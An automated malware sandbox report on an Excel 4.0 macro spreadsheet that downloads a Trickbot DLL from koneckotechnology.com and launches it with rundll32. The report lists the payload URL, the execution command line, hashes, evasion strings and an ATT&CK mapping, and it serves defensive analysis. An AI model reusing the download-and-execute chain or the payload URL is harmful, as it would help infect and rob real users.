Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: hsdksksk.iem.0.dr	Binary or memory string: ORIGINALFILENAMESNIFFER.EXEJ
Source: hsdksksk.iem.0.dr	Binary or memory string: INTERNALNAMESNIFFER.EXE

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00221030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_00221030

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_001C095E mov eax, dword ptr fs:[00000030h]	4_2_001C095E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_001C0456 mov eax, dword ptr fs:[00000030h]	4_2_001C0456
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00221030 mov eax, dword ptr fs:[00000030h]	4_2_00221030

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_00221030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_00221030

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe			Jump to behavior

Stealing of Sensitive Information:

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.1c052e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.290000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1c052e.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Trickbot

Show sources

Source: Yara match	File source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.1c052e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.290000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1c052e.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting11	Path Interception	Process Injection11	Masquerading121	OS Credential Dumping	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	System Information Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol22	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting11	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
c527325d_by_Libranalysis.xls	4%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.290000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
koneckotechnology.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://koneckotechnology.com/netmons.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
koneckotechnology.com	198.54.114.131	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://koneckotechnology.com/netmons.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	false		high
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.54.114.131	koneckotechnology.com	United States		22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	412517
Start date:	12.05.2021
Start time:	18:42:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	c527325d_by_Libranalysis (renamed file extension from none to xls)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@7/7@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.8% (good quality ratio 3.8%) Quality average: 100% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 4
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Max analysis timeout: 720s exceeded, the analysis took too long Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:42:44	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.114.131	Dridex.xls	Get hash	malicious	Browse	kmschoolsystems.net/lzpd0w.zip

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	CRPR7mRha6.exe	Get hash	malicious	Browse	198.54.122.60
	W9YDH79i8G.exe	Get hash	malicious	Browse	198.54.122.60
	Ko4zQgTBHv.exe	Get hash	malicious	Browse	198.54.122.60
	Purchase Order.exe	Get hash	malicious	Browse	198.54.126.165
	wed.doc	Get hash	malicious	Browse	198.54.122.60
	ORDER CONFIRMATION.doc	Get hash	malicious	Browse	198.54.122.60
	SecuriteInfo.com.Trojan.Packed2.43091.10004.exe	Get hash	malicious	Browse	198.54.122.60
	6e5c05e1_by_Libranalysis.exe	Get hash	malicious	Browse	198.54.122.60
	RFQ Plasma cutting machine.doc	Get hash	malicious	Browse	198.54.122.60
	Order 122001-220 guanzo.exe	Get hash	malicious	Browse	198.54.117.216
	main_setup_x86x64.exe	Get hash	malicious	Browse	162.255.119.164
	00098765123POIIU.exe	Get hash	malicious	Browse	199.192.23.253
	e8eRhf3GM0.xlsm	Get hash	malicious	Browse	185.61.154.27
	2021_May_Quotation_pdf.exe	Get hash	malicious	Browse	198.54.115.133
	337840b9_by_Libranalysis.exe	Get hash	malicious	Browse	198.54.122.60
	Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Get hash	malicious	Browse	198.54.117.212
	Updated Order list -804333.exe	Get hash	malicious	Browse	198.54.115.56
	NAVTECO_R1_10_05_2021,pdf.exe	Get hash	malicious	Browse	198.54.117.212
	BELLOW FABRICATION Dwg.exe	Get hash	malicious	Browse	199.188.200.15
	file.exe	Get hash	malicious	Browse	198.54.115.133

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	643072
Entropy (8bit):	6.894237499747235
Encrypted:	false
SSDEEP:	12288:o2ga6aRz0uEbMN7TR7EPMx4lK6SjVWDeyt7kGXDba2k5GA:fgPaRz3CMNR/4lu8f7Pnq5GA
MD5:	3BB9FE6B7E6B4D9C3A3C83DE6AACD952
SHA1:	57C343AE5E95FE702B759737522E85FE9E97FE5E
SHA-256:	697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
SHA-512:	1E98417C6C48E0BF405AE5FEDA4193C91A3B385F387F33D79FBA3DC6F7AA7571444885E6628B7CA6075887BFBEC3BD17E0782C11A1C45A7D4B1A139849CA4DF0
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........@.......................................................................................>..E...\!..........\|....................p...4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Y...@...0...@..............@....rsrc...\|............p..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0ADE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	82102
Entropy (8bit):	7.890626096401754
Encrypted:	false
SSDEEP:	1536:9KWFA4s1rWGH3W4nAeWRlMVGoIahaDHTU6hryF70KiE:9KWFA4s1rW23W4ng2sTU2yF70KiE
MD5:	E82FF35FBBA49380E42ADE23F37906D7
SHA1:	C28717159DD42598A4E7501BB7630D0A32EB2D43
SHA-256:	B6E45C9566AACDB98B66EAD78EF489D9855FFD38A6637C547917A9BCE7D487D9
SHA-512:	0F9F100EA6A326F6A273BFD05251480BAF288B8767DB237AA14C0F63D8EDCC921A62FE0F6454475ACA01A3EFFA842067A00255018FE8AD398B27F57CED7A9497
Malicious:	false
Reputation:	low
Preview:	.U.N.0....;D....&M....]2...0.Ic...1......A...H.$.......5..D...Y....J.u..^......pJ..e[@v.:.........[...s...+.....t>Z..3.y.r#......\z...:e..Z..N.T]..s..U?v.T.....'.`.I.P.iL... ...R$Z.~..A.z......^..La.Q.#Os<..q.i..VP]......\|0.......8Ivi..A.i..H..2..'n.........D^^./.\|...:-Ayykik....*d.49Ii..(.G#.%.b3.....eFnok.}.A..}\|. .../..\|..Phf6.....s...r/".?)R.{w...g\|.(..>6..#.1]:.W...B.....P.3..D.1i.W....W...z......P.&.y..V........PK..........!..uq.............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 00:42:41 2021, atime=Thu May 13 00:42:41 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.479919638534255
Encrypted:	false
SSDEEP:	12:85QmuLgXg/XAlCPCHaXtB8XzB/XKX+WnicvbrubDtZ3YilMMEpxRljKnXcTdJP9O:85zQ/XTd6jEYeviDv3qVrNru/
MD5:	CE58868C681A133B5618CD5A11E59B32
SHA1:	CDA344214073322A2281F6A7E75472B916A085F7
SHA-256:	2A4853E8E4D33E583147762DC659C7CFB989934470057CB9A16388E976FF9979
SHA-512:	EFA723EAE3BCCB4480697868B5F7DFDA84DCCCE3AF8192118FF181E71329014A1B68549FF3A0DC3E7C2315893CAB6BF8F63F1307BFE6E03B9BA3A833D825170A
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G...,+C.G...,+C.G... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......RU...Desktop.d......QK.X.RU...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\c527325d_by_Libranalysis.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 00:42:27 2021, mtime=Thu May 13 00:42:41 2021, atime=Thu May 13 00:42:41 2021, length=107520, window=hide
Category:	dropped
Size (bytes):	2168
Entropy (8bit):	4.557606654529506
Encrypted:	false
SSDEEP:	48:8uB/XT0jdOE+MJNbOE6VQh2uB/XT0jdOE+MJNbOE6VQ/:8m/XojdFtJNbF6VQh2m/XojdFtJNbF6K
MD5:	5DD899C8911F8629C1994B65031DE5F0
SHA1:	BF27500481C85281F59A1F12462C9BEBAF7E1EEB
SHA-256:	53281AB5EB97BF792FE85FFD5E674A083AFCEB24D8F74425786ACEF051B31006
SHA-512:	3F6D19EC89A50F64CB479E8F6191140AA9E153D6D299CCCBDE88E51EED0A0F2FC47305145CB227462D337249C8617CD6613E813653C20D37E98496A216D662DC
Malicious:	false
Reputation:	low
Preview:	L..................F.... .....);.G...,+C.G....7C.G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......RN...Desktop.d......QK.X.RN...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..T...RQ. .C52732~1.XLS..f......RN..RN....V.....................c.5.2.7.3.2.5.d._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\c527325d_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.5.2.7.3.2.5.d._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	125
Entropy (8bit):	4.774522284712134
Encrypted:	false
SSDEEP:	3:oyBVomMvZc6pMHUwSLMp6leQXS4c6pMHUwSLMp6lmMvZc6pMHUwSLMp6lv:dj6hcCM0N/S4cCM0NbhcCM0Nf
MD5:	356E64908463A408181B3E82536C2014
SHA1:	05226031E825F789B29C6D92B36A35C658A1B7CE
SHA-256:	536B17F7E0945BA45960E38619F68081CB0493F0BE9475A9B4BA381D26DBFC13
SHA-512:	EB86FFBC504744D139215354F8EAC9DF2A51FC2B406537238922DA95F6DA00FA59BF5E85671231BEB09E85D0D9E9C652F84DB089AEC8F8560669BC727A6A6EFE
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..c527325d_by_Libranalysis.LNK=0..c527325d_by_Libranalysis.LNK=0..[xls]..c527325d_by_Libranalysis.LNK=0..

C:\Users\user\Desktop\DADE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	140623
Entropy (8bit):	6.795332205043937
Encrypted:	false
SSDEEP:	3072:hm8rmjAItyzElBIL6lECbgBGGP5xLmuCSSN2rTUKyF70aieW2vHWdhdvHWg7hm8b:E8rmjAItyzElBIL6lECbgBvP5NmuCSSw
MD5:	960C9C8ECB04B532BD365699A5BB9086
SHA1:	A264CE9566E1022E2D60B307EC18B4F2C42691B2
SHA-256:	40CCC51ECF8F45715966469B32FF9CFB0AA33B0023A83CC21C4AC2EE1B7E8BC8
SHA-512:	86A65096F56B69CEE72D9BAC829CB62F5C4D261CD69CE4F42E2E2B5FB3428FD2CE6829B587F8E64A0DA46C9491C7F064234D7ABA125E283F45388BEA6261870E
Malicious:	false
Reputation:	low
Preview:	........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...........

C:\Users\user\hsdksksk.iem Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	643072
Entropy (8bit):	6.894237499747235
Encrypted:	false
SSDEEP:	12288:o2ga6aRz0uEbMN7TR7EPMx4lK6SjVWDeyt7kGXDba2k5GA:fgPaRz3CMNR/4lu8f7Pnq5GA
MD5:	3BB9FE6B7E6B4D9C3A3C83DE6AACD952
SHA1:	57C343AE5E95FE702B759737522E85FE9E97FE5E
SHA-256:	697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
SHA-512:	1E98417C6C48E0BF405AE5FEDA4193C91A3B385F387F33D79FBA3DC6F7AA7571444885E6628B7CA6075887BFBEC3BD17E0782C11A1C45A7D4B1A139849CA4DF0
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g]..#<.#<.#<.4..)<....%<.04..!<.&0..8<.&0...<.#<.b>.4..0<.&0..W<.&0.."<..7.."<.&0.."<.Rich#<.................PE..L......`...........!.........@.......................................................................................>..E...\!..........\|....................p...4......................................H.................... ..@....................text....x.......................... ..`.rdata..U...........................@..@.data....Y...@...0...@..............@....rsrc...\|............p..............@..@.reloc.......p.......@..............@..B........................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5465, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 13:44:28 2021, Security: 0
Entropy (8bit):	3.2168699589694834
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	c527325d_by_Libranalysis.xls
File size:	283648
MD5:	c527325d4d0b51734637b5344a3df760
SHA1:	f71b0baa85537ec1709701f39e8e9fd95f9b3d62
SHA256:	468cd4b5d89425cd29bb028696804ed339eb2c0c37b010b62442fbb5a8f778ba
SHA512:	074cfe3ecc88e982a704e979a3d63a7c286a30c8656dc71cf528336c7862090cdd134ebf641d336b0b7b6092838b007649bead23fe4cc1039a0a5611dc61f18c
SSDEEP:	6144:ncPiTQAVW/89BQnmlcGvgZ7rDjo88B3cvJK+6mF+:tk+
File Content Preview:	........................>.......................(...........................#...$...%...&...'..................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "c527325d_by_Libranalysis.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Last Saved By:	5465
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-05-12 12:44:28
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.305356156469
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . { . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
